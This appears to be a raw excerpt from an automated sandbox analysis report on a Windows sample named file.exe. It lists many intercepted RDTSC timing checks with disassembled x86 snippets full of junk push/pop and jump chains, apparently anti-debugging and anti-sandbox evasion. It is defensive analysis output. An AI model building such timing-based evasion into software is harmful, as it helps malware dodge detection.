                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100723C second address: 1007242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100738F second address: 1007394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1009F66 second address: 1009F70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F8408CC9F86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A0E9 second address: 100A0FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84086DC78Fh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A2BC second address: 100A2C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F8408CC9F86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A9EC second address: 100A9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100AC31 second address: 100AC46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408CC9F91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100AE15 second address: 100AE20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100AF83 second address: 100AFA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov edi, edx 0x0000000a xchg eax, ebx 0x0000000b jmp 00007F8408CC9F8Ch 0x00000010 push eax 0x00000011 pushad 0x00000012 jbe 00007F8408CC9F8Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100E455 second address: 100E45C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100E1E4 second address: 100E1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100E1E8 second address: 100E1ED instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100EE57 second address: 100EE68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8408CC9F8Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F850 second address: 100F85D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100EC11 second address: 100EC15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F85D second address: 100F861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F861 second address: 100F8DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408CC9F8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F8408CC9F8Ch 0x0000000f jg 00007F8408CC9F86h 0x00000015 popad 0x00000016 nop 0x00000017 mov esi, 4B6FB09Eh 0x0000001c push 00000000h 0x0000001e mov edi, esi 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edx 0x00000025 call 00007F8408CC9F88h 0x0000002a pop edx 0x0000002b mov dword ptr [esp+04h], edx 0x0000002f add dword ptr [esp+04h], 0000001Ch 0x00000037 inc edx 0x00000038 push edx 0x00000039 ret 0x0000003a pop edx 0x0000003b ret 0x0000003c adc si, F0D3h 0x00000041 xchg eax, ebx 0x00000042 jl 00007F8408CC9F95h 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b jnl 00007F8408CC9F92h 0x00000051 jmp 00007F8408CC9F8Ch 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F61D second address: 100F624 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101033F second address: 1010343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101396F second address: 10139ED instructions: 0x00000000 rdtsc 0x00000002 jl 00007F84086DC799h 0x00000008 jmp 00007F84086DC793h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jnl 00007F84086DC791h 0x00000016 nop 0x00000017 push ecx 0x00000018 mov ebx, edx 0x0000001a pop ebx 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007F84086DC788h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 0000001Ah 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 and edi, dword ptr [ebp+122D2A97h] 0x0000003d mov ebx, esi 0x0000003f push 00000000h 0x00000041 jmp 00007F84086DC78Eh 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F84086DC78Bh 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101492B second address: 1014930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013B46 second address: 1013B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F84086DC791h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1014930 second address: 1014983 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jmp 00007F8408CC9F93h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F8408CC9F88h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+122D22F2h], esi 0x00000034 sbb bh, 00000013h 0x00000037 push eax 0x00000038 push ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b jbe 00007F8408CC9F86h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013B60 second address: 1013B66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013B66 second address: 1013B6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049790 second address: 10497BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F8408CC9F9Dh 0x0000000c jg 00007F8408CC9F8Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10497BB second address: 10497C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10497C3 second address: 10497C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10497C7 second address: 10497E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F84086DC78Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10497E1 second address: 10497E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104E3FC second address: 104E400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104E545 second address: 104E55E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8408CC9F90h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104E6D8 second address: 104E6FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F84086DC791h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007F84086DC788h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104E6FB second address: 104E70E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408CC9F8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104E893 second address: 104E897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104E897 second address: 104E89B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104E89B second address: 104E8E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84086DC797h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F84086DC794h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F84086DC795h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104E8E5 second address: 104E8E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104EE89 second address: 104EEA2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F84086DC78Ch 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104EEA2 second address: 104EEBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8408CC9F93h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104EEBB second address: 104EEC2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104F2DC second address: 104F2EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F8408CC9F8Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104F2EA second address: 104F2F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104E0F7 second address: 104E107 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007F8408CC9F86h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104E107 second address: 104E10B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052CF1 second address: 1052CF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105286B second address: 105286F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1054F7E second address: 1054FC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408CC9F99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F8408CC9F8Ch 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 jmp 00007F8408CC9F97h 0x00000017 pop edi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1054FC3 second address: 1054FE8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007F84086DC786h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F84086DC797h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1054FE8 second address: 1054FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1058310 second address: 1058332 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F84086DC786h 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F84086DC795h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1058332 second address: 1058354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F8408CC9F99h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105E353 second address: 105E357 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105E4B8 second address: 105E4BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105E60B second address: 105E61C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007F84086DC786h 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105E61C second address: 105E622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105E622 second address: 105E62C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F84086DC786h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105E62C second address: 105E644 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8408CC9F86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jp 00007F8408CC9F86h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1064942 second address: 1064946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1064946 second address: 1064971 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F8408CC9F94h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8408CC9F8Bh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10631FB second address: 106320C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jmp 00007F84086DC78Ah 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106320C second address: 106323A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8408CC9F8Ah 0x00000008 pushad 0x00000009 jmp 00007F8408CC9F8Fh 0x0000000e jmp 00007F8408CC9F90h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1063810 second address: 1063815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10639BA second address: 10639C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10639C1 second address: 10639C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10639C7 second address: 10639CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012222 second address: 1012261 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F84086DC786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F84086DC78Bh 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F84086DC78Ah 0x00000016 nop 0x00000017 mov dx, 2362h 0x0000001b push 00000004h 0x0000001d jmp 00007F84086DC791h 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012261 second address: 1012265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012265 second address: 101226F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101226F second address: 1012273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067824 second address: 1067835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067835 second address: 1067839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1066F3B second address: 1066F65 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F84086DC788h 0x00000008 jno 00007F84086DC78Eh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F84086DC78Bh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1066F65 second address: 1066F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067221 second address: 1067253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84086DC791h 0x00000009 popad 0x0000000a jmp 00007F84086DC791h 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jno 00007F84086DC786h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067253 second address: 1067257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067257 second address: 106725D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106725D second address: 1067263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106F8E1 second address: 106F8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F84086DC786h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106F8EB second address: 106F8F1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106F8F1 second address: 106F8F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106F8F7 second address: 106F923 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408CC9F92h 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F8408CC9F93h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106D991 second address: 106D9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F84086DC795h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106DADB second address: 106DAF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8408CC9F91h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106DAF9 second address: 106DB12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84086DC793h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106DB12 second address: 106DB1C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8408CC9F8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106DC67 second address: 106DC6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106E54A second address: 106E54E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106E54E second address: 106E56F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F84086DC786h 0x0000000a jmp 00007F84086DC797h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106E841 second address: 106E847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106F39F second address: 106F3BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84086DC797h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106F3BA second address: 106F3C8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8408CC9F86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106F3C8 second address: 106F3D2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F84086DC786h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106F666 second address: 106F66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106F66F second address: 106F675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106F675 second address: 106F679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10742FD second address: 1074319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84086DC797h 0x00000009 pop ebx 0x0000000a rdtsc
